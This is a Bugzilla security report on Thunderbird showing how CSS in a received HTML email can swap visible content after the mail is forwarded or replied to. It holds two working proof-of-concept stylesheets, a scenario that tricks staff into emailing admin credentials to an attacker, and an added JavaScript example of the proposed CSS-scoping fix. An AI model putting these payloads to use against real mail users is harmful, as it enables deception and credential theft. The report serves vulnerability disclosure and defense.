Closed Bug 1796180 Opened 2 years ago Closed 2 years ago

Thunderbird - Modification of replied mail content without knowledge of replier of the mail using CSS

Categories

(Thunderbird :: Security, defect)

defect

Tracking

(Not tracked)

RESOLVED DUPLICATE of bug 1688659

People

(Reporter: ramkumarg1605, Unassigned)

References

()

Details

(Whiteboard: [reporter-external] [client-bounty-form] [verif?])

Attachments

(2 files)

Attached video thunderbird-poc.mp4 (deleted) —

Summary:

A hacker can modify the contents of the forwarded mail, including the message added by the forwarder and the forwarded headers, without the forwarder's knowledge.

Steps to Reproduce:

  1. To reproduce this issue you need 2 email accounts in Thunderbird, e.g. victim1@mail.com and victim2@mail.com (you can use the same email if you want).
  2. Use any mail client to send an HTML email to victim1@mail.com [sample HTML code given below].
  3. Open that mail in victim1's inbox.
  4. Click the Forward button, add victim2@mail.com in the To field and add any message you want.
  5. Click Send and open that mail in the victim2@mail.com inbox.
  6. You can see that the whole contents have changed.

Sample HTML Code:

<style>
  div > p {
    visibility: hidden !important;
    font-size: 1px !important;
    line-height: 0 !important;
  }
  div > .moz-forward-container {
    visibility: hidden !important;
    font-size: 1px !important;
    line-height: 0 !important;
  }
  div .moz-forward-container .a {
    visibility: hidden !important;
    font-size: 1px !important;
    line-height: 0 !important;
  }
  div .moz-forward-container .b {
    visibility: visible !important;
    font-size: 16px !important;
    line-height: 1.5 !important;
  }
</style>
<div>This content will be visible always<br>
  <span class="a">
    This content will display only before forward
  </span>
  <span class="b" style="visibility: hidden; font-size: 1px; line-height: 0">
    This content will display only after forward<br>
    Hacker can modify all the contents including message added by forwarder of the mail, forward headers
  </span>
</div>

Impact:

  1. A hacker can cause miscommunication between victims.
  2. This reduces the user experience and the integrity of the mail.
  3. It has high impact because a hacker can fully customize the contents of the forwarded mail, including the message added by the forwarder and the forwarded headers, with his HTML and CSS skills.

Example Attack scenario:

The hacker sends a mail to the CEO. The CEO will see "I need my account details" and thinks the mail was wrongly sent to him, so he forwards that mail to the IT team with the message "Send him the details". But when the IT team opens the mail they will see "send admin username and password to attacker@mail.com", so they will send the admin credentials to the attacker because their superior said so.

Fix:

Don't allow the hacker to access content outside of this HTML. Put all the HTML content received from the user into a div and modify all the CSS styles by adding the class name of that parent div.
Or convert all the CSS to inline CSS and use it in all places.

Thanks

Flags: sec-bounty?
Group: firefox-core-security → mail-core-security
Product: Firefox → Thunderbird

Hi,

A hacker can also modify the contents of the mail after a reply.

Sample HTML Code:

<style>
  div blockquote, div p, div .moz-cite-prefix {
    visibility: hidden;
  }
  div blockquote .a {
    visibility: visible !important;
  }
</style>
<div class="a" style="visibility: hidden;"><span>This will display only after reply</span></div>
<div class="b"><span>This will display only before reply</span></div>

Example scenario:

The hacker sends a mail to the CEO. The CEO will see "I need my account details" and thinks the mail was wrongly sent to him, so he follows up by replying to the mail, adding the IT team's email address in the To field, with the message "Send him the details". But when the IT team opens the mail they will see "send admin username and password to attacker@mail.com", so they will send the admin credentials to the attacker because their superior said so.

Attached video thunderbird-reply-poc.mp4 (deleted) —

PoC for modification of contents after replying to a mail
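The two PoCs above work for the same reason: the `<style>` element of the received message survives into the reply/forward, and its selectors are free to match Thunderbird's own wrapper markup (`.moz-forward-container`, `.moz-cite-prefix`, the quoting `blockquote`), while `!important` lets them beat the inline `visibility: hidden` the attacker planted on the "after" span. The following is an added example in JavaScript, not Thunderbird's code and not part of the report, of the first fix the reporter proposes: put the received HTML into a wrapper element and rewrite every selector so it can only match descendants of that wrapper. It also drops `!important`, which is what makes the inline-vs-stylesheet trick work. The wrapper class `.msg-untrusted`, the function names and the hand-rolled scanner are assumptions of this example; the two stylesheets embedded in it are the report's own PoC CSS.

```javascript
'use strict';
// Added example, not Thunderbird code. Scope a received message's CSS to a
// wrapper <div class="msg-untrusted"> (class name assumed for this example)
// so its rules cannot reach the client's reply/forward markup, and strip
// `!important` so message rules cannot override inline or client styles.

const SCOPE = '.msg-untrusted';

// Rewrite one stylesheet body. Plain rules get the scope prefix on each
// comma-separated selector; @media/@supports bodies are scoped recursively;
// all other at-rules (@import, @font-face, @keyframes, ...) are dropped.
// Limitation: this is a scanner, not a CSS parser. Braces inside strings or
// url() would confuse it; a real client should parse via the CSSOM instead.
function scopeStylesheet(css, scope = SCOPE) {
  css = css
    .replace(/\/\*[\s\S]*?\*\//g, '')                      // drop comments
    .replace(/@(import|charset|namespace)[^;{]*;/gi, '');  // braceless at-rules
  const rules = [];
  let pos = 0;
  while (pos < css.length) {
    const open = css.indexOf('{', pos);
    if (open === -1) break;
    const prelude = css.slice(pos, open).replace(/\s+/g, ' ').trim();
    if (prelude.startsWith('@')) {
      // Find the closing brace of the whole at-rule block.
      let depth = 1, j = open + 1;
      while (j < css.length && depth > 0) {
        if (css[j] === '{') depth++;
        else if (css[j] === '}') depth--;
        j++;
      }
      if (/^@(media|supports)\b/i.test(prelude)) {
        const inner = scopeStylesheet(css.slice(open + 1, j - 1), scope);
        rules.push(`${prelude} { ${inner} }`);
      }
      pos = j;
      continue;
    }
    const close = css.indexOf('}', open);
    if (close === -1) break;
    const decls = css.slice(open + 1, close)
      .replace(/\s*!\s*important/gi, '')   // message CSS never wins by priority
      .replace(/\s+/g, ' ')
      .trim();
    if (prelude && decls) {
      const scoped = prelude.split(',').map(s => `${scope} ${s.trim()}`).join(', ');
      rules.push(`${scoped} { ${decls} }`);
    }
    pos = close + 1;
  }
  return rules.join('\n');
}

// Rewrite every <style> block of a message and wrap the message in the scoping
// <div>. Inline style="" attributes are left alone: they only affect their own
// element, so they cannot reach the quote/forward markup around the message.
function scopeHtml(html, scope = SCOPE) {
  const rewritten = html.replace(/<style\b[^>]*>([\s\S]*?)<\/style>/gi,
    (_m, body) => `<style>${scopeStylesheet(body, scope)}</style>`);
  return `<div class="${scope.slice(1)}">${rewritten}</div>`;
}

// Check helper: every emitted rule starts with the scope (or is a scoped
// @media/@supports block) and no `!important` survived.
function allRulesScoped(scopedCss, scope = SCOPE) {
  return scopedCss.split('\n').every(line =>
    (line.startsWith(`${scope} `) || line.startsWith('@')) &&
    !/!\s*important/i.test(line));
}

// The report's forward PoC stylesheet (copied from the bug, not constructed).
const FORWARD_POC_CSS = `
  div > p { visibility: hidden !important; font-size: 1px !important; line-height: 0 !important; }
  div > .moz-forward-container { visibility: hidden !important; font-size: 1px !important; line-height: 0 !important; }
  div .moz-forward-container .a { visibility: hidden !important; font-size: 1px !important; line-height: 0 !important; }
  div .moz-forward-container .b { visibility: visible !important; font-size: 16px !important; line-height: 1.5 !important; }
`;

// The report's reply PoC stylesheet (copied from the bug, not constructed).
const REPLY_POC_CSS = `
  div blockquote, div p, div .moz-cite-prefix {
    visibility: hidden;
  }
  div blockquote .a {
    visibility: visible !important;
  }
`;

if (typeof require !== 'undefined' && require.main === module) {
  console.log(scopeStylesheet(FORWARD_POC_CSS));
  console.log(scopeStylesheet(REPLY_POC_CSS));
}
```

After rewriting, `div .moz-forward-container .b` becomes `.msg-untrusted div .moz-forward-container .b`, which only matches a `.moz-forward-container` that sits inside the untrusted wrapper; Thunderbird's own container sits outside it, so the rule is inert after forwarding, and without `!important` the attacker's inline `visibility: hidden` on the "after" span stays in force. The same holds for the reply PoC's `div blockquote .a`. Note the check function is a regression test for the scoper, not a security boundary: whether a client's real wrapper is reachable depends on the client's own markup, and a production implementation should work on the parsed CSSOM rather than on text.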

You're talking about replies, not forwarding.

See bug 1731198 and bugs linked there. This is more or less a duplicate.

Summary: Thunderbird - Modification of Forwarded mail content without knowledge of forwarder of the mail using CSS → Thunderbird - Modification of replied mail content without knowledge of replier of the mail using CSS

A hacker can modify both forwarded mails and reply mails. PoCs are provided for both of them.

Ramkumar, thanks for your report.
We were already aware that CSS can have some unfortunate effects, but I wasn't aware it's that bad.

I cannot reproduce these bugs with gmail.com and Outlook on Windows 11.

Status: UNCONFIRMED → NEW
Ever confirmed: true

This is probably the same report as bug 1688659 ?

Bug 1688659 comment 5 has a link to a good article on this issue.

If this bug is the same, we don't need to keep it hidden.

(In reply to Kai Engert (:KaiE:) from comment #6)

This is probably the same report as bug 1688659 ?

It does seem so.

Note - Thunderbird does not offer bounties

Group: mail-core-security
Status: NEW → RESOLVED
Closed: 2 years ago
Duplicate of bug: 1688659
Flags: sec-bounty?
Resolution: --- → DUPLICATE